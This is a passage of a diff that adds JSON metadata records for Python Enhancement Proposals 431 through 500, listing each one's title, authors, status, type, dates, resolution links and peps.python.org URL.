"https://peps.python.org/pep-0431/" + }, + "432": { + "number": 432, + "title": "Restructuring the CPython startup sequence", + "authors": "Alyssa Coghlan, Victor Stinner, Eric Snow", + "discussions_to": "capi-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "28-Dec-2012", + "python_version": null, + "post_history": "28-Dec-2012, 02-Jan-2013, 30-Mar-2019, 28-Jun-2020", + "resolution": null, + "requires": "587", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0432/" + }, + "433": { + "number": 433, + "title": "Easier suppression of file descriptor inheritance", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Superseded", + "type": "Standards Track", + "topic": "", + "created": "10-Jan-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": "446", + "url": "https://peps.python.org/pep-0433/" + }, + "434": { + "number": 434, + "title": "IDLE Enhancement Exception for All Branches", + "authors": "Todd Rovito, Terry Reedy", + "discussions_to": null, + "status": "Active", + "type": "Informational", + "topic": "", + "created": "16-Feb-2013", + "python_version": null, + "post_history": "16-Feb-2013, 03-Mar-2013, 21-Mar-2013, 30-Mar-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-March/125003.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0434/" + }, + "435": { + "number": 435, + "title": "Adding an Enum type to the Python standard library", + "authors": "Barry Warsaw, Eli Bendersky, Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Feb-2013", + "python_version": "3.4", + "post_history": "23-Feb-2013, 02-May-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126112.html", + "requires": null, + "replaces": "354", + "superseded_by": null, + "url": "https://peps.python.org/pep-0435/" + }, + "436": { + "number": 436, + "title": "The Argument Clinic DSL", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-Feb-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0436/" + }, + "437": { + "number": 437, + "title": "A DSL for specifying signatures, annotations and argument converters", + "authors": "Stefan Krah", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "11-Mar-2013", + "python_version": "3.4", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-May/126117.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0437/" + }, + "438": { + "number": 438, + "title": "Transitioning to release-file hosting on PyPI", + "authors": "Holger Krekel, Carl Meyer", + "discussions_to": "distutils-sig@python.org", + "status": "Superseded", + "type": "Process", + "topic": "packaging", + "created": "15-Mar-2013", + "python_version": null, + "post_history": "19-May-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-May/020773.html", + "requires": null, + "replaces": null, + "superseded_by": "470", + "url": "https://peps.python.org/pep-0438/" 
+ }, + "439": { + "number": 439, + "title": "Inclusion of implicit pip bootstrap in Python installation", + "authors": "Richard Jones", + "discussions_to": "distutils-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2013", + "python_version": "3.4", + "post_history": "19-Mar-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-August/022527.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0439/" + }, + "440": { + "number": 440, + "title": "Version Identification and Dependency Specification", + "authors": "Alyssa Coghlan, Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "packaging", + "created": "18-Mar-2013", + "python_version": null, + "post_history": "30-Mar-2013, 27-May-2013, 20-Jun-2013, 21-Dec-2013, 28-Jan-2014, 08-Aug-2014, 22-Aug-2014", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2014-August/024673.html", + "requires": null, + "replaces": "386", + "superseded_by": null, + "url": "https://peps.python.org/pep-0440/" + }, + "441": { + "number": 441, + "title": "Improving Python ZIP Application Support", + "authors": "Daniel Holth, Paul Moore", + "discussions_to": "https://mail.python.org/pipermail/python-dev/2015-February/138277.html", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2013", + "python_version": "3.5", + "post_history": "30-Mar-2013, 01-Apr-2013, 16-Feb-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138578.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0441/" + }, + "442": { + "number": 442, + "title": "Safe object finalization", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "18-May-2013", + "python_version": "3.4", + "post_history": "18-May-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-June/126746.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0442/" + }, + "443": { + "number": 443, + "title": "Single-dispatch generic functions", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "22-May-2013", + "python_version": "3.4", + "post_history": "22-May-2013, 25-May-2013, 31-May-2013", + "resolution": null, + "requires": null, + "replaces": "245, 246, 3124", + "superseded_by": null, + "url": "https://peps.python.org/pep-0443/" + }, + "444": { + "number": 444, + "title": "Python Web3 Interface", + "authors": "Chris McDonough, Armin Ronacher", + "discussions_to": "web-sig@python.org", + "status": "Deferred", + "type": "Informational", + "topic": "", + "created": "19-Jul-2010", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0444/" + }, + "445": { + "number": 445, + "title": "Add new APIs to customize Python memory allocators", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Jun-2013", + "python_version": "3.4", + "post_history": null, + "resolution": 
"https://mail.python.org/pipermail/python-dev/2013-July/127222.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0445/" + }, + "446": { + "number": 446, + "title": "Make newly created file descriptors non-inheritable", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Aug-2013", + "python_version": "3.4", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "433", + "superseded_by": null, + "url": "https://peps.python.org/pep-0446/" + }, + "447": { + "number": 447, + "title": "Add __getdescriptor__ method to metaclass", + "authors": "Ronald Oussoren", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "12-Jun-2013", + "python_version": null, + "post_history": "02-Jul-2013, 15-Jul-2013, 29-Jul-2013, 22-Jul-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0447/" + }, + "448": { + "number": 448, + "title": "Additional Unpacking Generalizations", + "authors": "Joshua Landau", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jun-2013", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0448/" + }, + "449": { + "number": 449, + "title": "Removal of the PyPI Mirror Auto Discovery and Naming Scheme", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "04-Aug-2013", + "python_version": null, + "post_history": "04-Aug-2013", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2013-August/022518.html", + "requires": null, + "replaces": "381", + "superseded_by": null, + "url": "https://peps.python.org/pep-0449/" + }, + "450": { + "number": 450, + "title": "Adding A Statistics Module To The Standard Library", + "authors": "Steven D'Aprano", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Aug-2013", + "python_version": "3.4", + "post_history": "13-Sep-2013", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0450/" + }, + "451": { + "number": 451, + "title": "A ModuleSpec Type for the Import System", + "authors": "Eric Snow", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2013", + "python_version": "3.4", + "post_history": "08-Aug-2013, 28-Aug-2013, 18-Sep-2013, 24-Sep-2013, 04-Oct-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130104.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0451/" + }, + "452": { + "number": 452, + "title": "API for Cryptographic Hash Functions v2.0", + "authors": "A.M. 
Kuchling, Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "", + "created": "15-Aug-2013", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": "247", + "superseded_by": null, + "url": "https://peps.python.org/pep-0452/" + }, + "453": { + "number": 453, + "title": "Explicit bootstrapping of pip in Python installations", + "authors": "Donald Stufft, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-Aug-2013", + "python_version": null, + "post_history": "30-Aug-2013, 15-Sep-2013, 18-Sep-2013, 19-Sep-2013, 23-Sep-2013, 29-Sep-2013, 13-Oct-2013, 20-Oct-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-October/129810.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0453/" + }, + "454": { + "number": 454, + "title": "Add a new tracemalloc module to trace Python memory allocations", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "03-Sep-2013", + "python_version": "3.4", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130491.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0454/" + }, + "455": { + "number": 455, + "title": "Adding a key-transforming dictionary to collections", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "13-Sep-2013", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0455/" + }, + "456": { + "number": 456, + "title": "Secure and interchangeable hash algorithm", + "authors": "Christian Heimes", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Sep-2013", + "python_version": "3.4", + "post_history": "06-Oct-2013, 14-Nov-2013, 20-Nov-2013", + "resolution": "https://mail.python.org/pipermail/python-dev/2013-November/130400.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0456/" + }, + "457": { + "number": 457, + "title": "Notation For Positional-Only Parameters", + "authors": "Larry Hastings", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Informational", + "topic": "", + "created": "08-Oct-2013", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0457/" + }, + "458": { + "number": 458, + "title": "Secure PyPI downloads with signed repository metadata", + "authors": "Trishank Karthik Kuppusamy, Vladimir Diaz, Marina Moore, Lukas Puehringer, Joshua Lock, Lois Anne DeLong, Justin Cappos", + "discussions_to": "https://discuss.python.org/t/pep-458-secure-pypi-downloads-with-package-signing/2648", + "status": "Accepted", + "type": "Standards Track", + "topic": "packaging", + "created": "27-Sep-2013", + "python_version": null, + "post_history": "06-Jan-2019, 13-Nov-2019", + "resolution": "https://discuss.python.org/t/pep-458-secure-pypi-downloads-with-package-signing/2648/115", + "requires": null, + "replaces": null, + "superseded_by": null, + 
"url": "https://peps.python.org/pep-0458/" + }, + "459": { + "number": 459, + "title": "Standard Metadata Extensions for Python Software Packages", + "authors": "Alyssa Coghlan", + "discussions_to": "distutils-sig@python.org", + "status": "Withdrawn", + "type": "Standards Track", + "topic": "packaging", + "created": "11-Nov-2013", + "python_version": null, + "post_history": "21-Dec-2013", + "resolution": null, + "requires": "426", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0459/" + }, + "460": { + "number": 460, + "title": "Add binary interpolation and formatting", + "authors": "Antoine Pitrou", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "06-Jan-2014", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0460/" + }, + "461": { + "number": 461, + "title": "Adding % formatting to bytes and bytearray", + "authors": "Ethan Furman", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "13-Jan-2014", + "python_version": "3.5", + "post_history": "14-Jan-2014, 15-Jan-2014, 17-Jan-2014, 22-Feb-2014, 25-Mar-2014, 27-Mar-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-March/133621.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0461/" + }, + "462": { + "number": 462, + "title": "Core development workflow automation for CPython", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "23-Jan-2014", + "python_version": null, + "post_history": "25-Jan-2014, 27-Jan-2014, 01-Feb-2015", + "resolution": null, + "requires": "474", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0462/" + }, + "463": { + "number": 463, + "title": "Exception-catching expressions", + "authors": "Chris Angelico", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "15-Feb-2014", + "python_version": "3.5", + "post_history": "20-Feb-2014, 16-Feb-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-March/133118.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0463/" + }, + "464": { + "number": 464, + "title": "Removal of the PyPI Mirror Authenticity API", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "02-Mar-2014", + "python_version": null, + "post_history": "04-Mar-2014", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2014-March/024027.html", + "requires": null, + "replaces": "381", + "superseded_by": null, + "url": "https://peps.python.org/pep-0464/" + }, + "465": { + "number": 465, + "title": "A dedicated infix operator for matrix multiplication", + "authors": "Nathaniel J. 
Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Feb-2014", + "python_version": "3.5", + "post_history": "13-Mar-2014", + "resolution": "https://mail.python.org/archives/list/python-dev@python.org/message/D63NDWHPF7OC2Z455MPHOW6QLLSNQUJ5/", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0465/" + }, + "466": { + "number": 466, + "title": "Network Security Enhancements for Python 2.7.x", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "23-Mar-2014", + "python_version": "2.7.9", + "post_history": "23-Mar-2014, 24-Mar-2014, 25-Mar-2014, 26-Mar-2014, 16-Apr-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-April/134163.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0466/" + }, + "467": { + "number": 467, + "title": "Minor API improvements for binary sequences", + "authors": "Alyssa Coghlan, Ethan Furman", + "discussions_to": "https://discuss.python.org/t/42001", + "status": "Draft", + "type": "Standards Track", + "topic": "", + "created": "30-Mar-2014", + "python_version": "3.13", + "post_history": "30-Mar-2014, 15-Aug-2014, 16-Aug-2014, 07-Jun-2016, 01-Sep-2016, 13-Apr-2021, 03-Nov-2021, 27-Dec-2023", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0467/" + }, + "468": { + "number": 468, + "title": "Preserving the order of \\*\\*kwargs in a function.", + "authors": "Eric Snow", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "05-Apr-2014", + "python_version": "3.6", + "post_history": "05-Apr-2014, 08-Sep-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-September/146329.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0468/" + }, + "469": { + "number": 469, + "title": "Migration of dict iteration code to Python 3", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Standards Track", + "topic": "", + "created": "18-Apr-2014", + "python_version": "3.5", + "post_history": "18-Apr-2014, 21-Apr-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0469/" + }, + "470": { + "number": 470, + "title": "Removing External Hosting Support on PyPI", + "authors": "Donald Stufft", + "discussions_to": "distutils-sig@python.org", + "status": "Final", + "type": "Process", + "topic": "packaging", + "created": "12-May-2014", + "python_version": null, + "post_history": "14-May-2014, 05-Jun-2014, 03-Oct-2014, 13-Oct-2014, 26-Aug-2015", + "resolution": "https://mail.python.org/pipermail/distutils-sig/2015-September/026789.html", + "requires": null, + "replaces": "438", + "superseded_by": null, + "url": "https://peps.python.org/pep-0470/" + }, + "471": { + "number": 471, + "title": "os.scandir() function -- a better and faster directory iterator", + "authors": "Ben Hoyt", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "30-May-2014", + "python_version": "3.5", + "post_history": "27-Jun-2014, 08-Jul-2014, 14-Jul-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": 
"https://peps.python.org/pep-0471/" + }, + "472": { + "number": 472, + "title": "Support for indexing with keyword arguments", + "authors": "Stefano Borini, Joseph Martinot-Lagarde", + "discussions_to": "python-ideas@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "24-Jun-2014", + "python_version": "3.6", + "post_history": "02-Jul-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156693.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0472/" + }, + "473": { + "number": 473, + "title": "Adding structured data to built-in exceptions", + "authors": "Sebastian Kreft", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "29-Mar-2014", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2019-March/156692.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0473/" + }, + "474": { + "number": 474, + "title": "Creating forge.python.org", + "authors": "Alyssa Coghlan", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "19-Jul-2014", + "python_version": null, + "post_history": "19-Jul-2014, 08-Jan-2015, 01-Feb-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0474/" + }, + "475": { + "number": 475, + "title": "Retry system calls failing with EINTR", + "authors": "Charles-Fran\u00e7ois Natali, Victor Stinner", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "29-Jul-2014", + "python_version": "3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138018.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0475/" + }, + "476": { + "number": 476, + "title": "Enabling certificate verification by default for stdlib http clients", + "authors": "Alex Gaynor", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "28-Aug-2014", + "python_version": "2.7.9, 3.4.3, 3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2014-October/136676.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0476/" + }, + "477": { + "number": 477, + "title": "Backport ensurepip (PEP 453) to Python 2.7", + "authors": "Donald Stufft, Alyssa Coghlan", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "26-Aug-2014", + "python_version": null, + "post_history": "01-Sep-2014", + "resolution": "https://mail.python.org/pipermail/python-dev/2014-September/136238.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0477/" + }, + "478": { + "number": 478, + "title": "Python 3.5 Release Schedule", + "authors": "Larry Hastings", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "22-Sep-2014", + "python_version": "3.5", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0478/" + }, + "479": { + "number": 479, + "title": "Change StopIteration 
handling inside generators", + "authors": "Chris Angelico, Guido van Rossum", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "15-Nov-2014", + "python_version": "3.5", + "post_history": "15-Nov-2014, 19-Nov-2014, 05-Dec-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0479/" + }, + "480": { + "number": 480, + "title": "Surviving a Compromise of PyPI: End-to-end signing of packages", + "authors": "Trishank Karthik Kuppusamy, Vladimir Diaz, Justin Cappos, Marina Moore", + "discussions_to": "https://discuss.python.org/t/5666", + "status": "Draft", + "type": "Standards Track", + "topic": "packaging", + "created": "08-Oct-2014", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": "458", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0480/" + }, + "481": { + "number": 481, + "title": "Migrate CPython to Git, Github, and Phabricator", + "authors": "Donald Stufft", + "discussions_to": null, + "status": "Withdrawn", + "type": "Process", + "topic": "", + "created": "29-Nov-2014", + "python_version": null, + "post_history": "29-Nov-2014", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0481/" + }, + "482": { + "number": 482, + "title": "Literature Overview for Type Hints", + "authors": "\u0141ukasz Langa", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Informational", + "topic": "typing", + "created": "08-Jan-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0482/" + }, + "483": { + "number": 483, + "title": "The Theory of Type Hints", + "authors": "Guido van Rossum, Ivan Levkivskyi", + "discussions_to": "python-ideas@python.org", + "status": "Final", + "type": "Informational", + "topic": "typing", + "created": "19-Dec-2014", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0483/" + }, + "484": { + "number": 484, + "title": "Type Hints", + "authors": "Guido van Rossum, Jukka Lehtosalo, \u0141ukasz Langa", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "typing", + "created": "29-Sep-2014", + "python_version": "3.5", + "post_history": "16-Jan-2015, 20-Mar-2015, 17-Apr-2015, 20-May-2015, 22-May-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-May/140104.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0484/" + }, + "485": { + "number": 485, + "title": "A Function for testing approximate equality", + "authors": "Christopher Barker", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Jan-2015", + "python_version": "3.5", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138598.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0485/" + }, + "486": { + "number": 486, + "title": "Make the Python Launcher aware of virtual environments", + "authors": "Paul Moore", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", 
+ "topic": "", + "created": "12-Feb-2015", + "python_version": "3.5", + "post_history": "12-Feb-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-February/138579.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0486/" + }, + "487": { + "number": 487, + "title": "Simpler customisation of class creation", + "authors": "Martin Teichmann", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "27-Feb-2015", + "python_version": "3.6", + "post_history": "27-Feb-2015, 05-Feb-2016, 24-Jun-2016, 02-Jul-2016, 13-Jul-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-July/145629.html", + "requires": null, + "replaces": "422", + "superseded_by": null, + "url": "https://peps.python.org/pep-0487/" + }, + "488": { + "number": 488, + "title": "Elimination of PYO files", + "authors": "Brett Cannon", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "20-Feb-2015", + "python_version": "3.5", + "post_history": "06-Mar-2015, 13-Mar-2015, 20-Mar-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0488/" + }, + "489": { + "number": 489, + "title": "Multi-phase extension module initialization", + "authors": "Petr Viktorin, Stefan Behnel, Alyssa Coghlan", + "discussions_to": "import-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "11-Aug-2013", + "python_version": "3.5", + "post_history": "23-Aug-2013, 20-Feb-2015, 16-Apr-2015, 07-May-2015, 18-May-2015", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-May/140108.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0489/" + }, + "490": { + "number": 490, + "title": "Chain exceptions at C level", + "authors": "Victor Stinner", + "discussions_to": null, + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "25-Mar-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0490/" + }, + "491": { + "number": 491, + "title": "The Wheel Binary Package Format 1.9", + "authors": "Daniel Holth", + "discussions_to": "distutils-sig@python.org", + "status": "Deferred", + "type": "Standards Track", + "topic": "packaging", + "created": "16-Apr-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0491/" + }, + "492": { + "number": 492, + "title": "Coroutines with async and await syntax", + "authors": "Yury Selivanov", + "discussions_to": "python-dev@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "09-Apr-2015", + "python_version": "3.5", + "post_history": "17-Apr-2015, 21-Apr-2015, 27-Apr-2015, 29-Apr-2015, 05-May-2015", + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0492/" + }, + "493": { + "number": 493, + "title": "HTTPS verification migration tools for Python 2.7", + "authors": "Alyssa Coghlan, Robert Kuska, Marc-Andr\u00e9 Lemburg", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "10-May-2015", + "python_version": 
"2.7.12", + "post_history": "06-Jul-2015, 11-Nov-2015, 24-Nov-2015, 24-Feb-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2016-March/143450.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0493/" + }, + "494": { + "number": 494, + "title": "Python 3.6 Release Schedule", + "authors": "Ned Deily", + "discussions_to": null, + "status": "Final", + "type": "Informational", + "topic": "release", + "created": "30-May-2015", + "python_version": "3.6", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0494/" + }, + "495": { + "number": 495, + "title": "Local Time Disambiguation", + "authors": "Alexander Belopolsky, Tim Peters", + "discussions_to": "datetime-sig@python.org", + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "02-Aug-2015", + "python_version": "3.6", + "post_history": null, + "resolution": "https://mail.python.org/pipermail/datetime-sig/2015-September/000900.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0495/" + }, + "496": { + "number": 496, + "title": "Environment Markers", + "authors": "James Polley", + "discussions_to": null, + "status": "Rejected", + "type": "Informational", + "topic": "packaging", + "created": "03-Jul-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0496/" + }, + "497": { + "number": 497, + "title": "A standard mechanism for backward compatibility", + "authors": "Ed Schofield", + "discussions_to": null, + "status": "Rejected", + "type": "Process", + "topic": "", + "created": "04-Aug-2015", + "python_version": null, + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0497/" + }, + "498": { + "number": 498, + "title": "Literal String Interpolation", + "authors": "Eric V. 
Smith", + "discussions_to": null, + "status": "Final", + "type": "Standards Track", + "topic": "", + "created": "01-Aug-2015", + "python_version": "3.6", + "post_history": "07-Aug-2015, 30-Aug-2015, 04-Sep-2015, 19-Sep-2015, 06-Nov-2016", + "resolution": "https://mail.python.org/pipermail/python-dev/2015-September/141526.html", + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0498/" + }, + "499": { + "number": 499, + "title": "``python -m foo`` should also bind ``'foo'`` in ``sys.modules``", + "authors": "Cameron Simpson, Chris Angelico, Joseph Jevnik", + "discussions_to": null, + "status": "Deferred", + "type": "Standards Track", + "topic": "", + "created": "07-Aug-2015", + "python_version": "3.10", + "post_history": null, + "resolution": null, + "requires": null, + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0499/" + }, + "500": { + "number": 500, + "title": "A protocol for delegating datetime methods to their tzinfo implementations", + "authors": "Alexander Belopolsky, Tim Peters", + "discussions_to": "datetime-sig@python.org", + "status": "Rejected", + "type": "Standards Track", + "topic": "", + "created": "08-Aug-2015", + "python_version": null, + "post_history": null, + "resolution": "https://mail.python.org/pipermail/datetime-sig/2015-August/000354.html", + "requires": "495", + "replaces": null, + "superseded_by": null, + "url": "https://peps.python.org/pep-0500/" + }, + 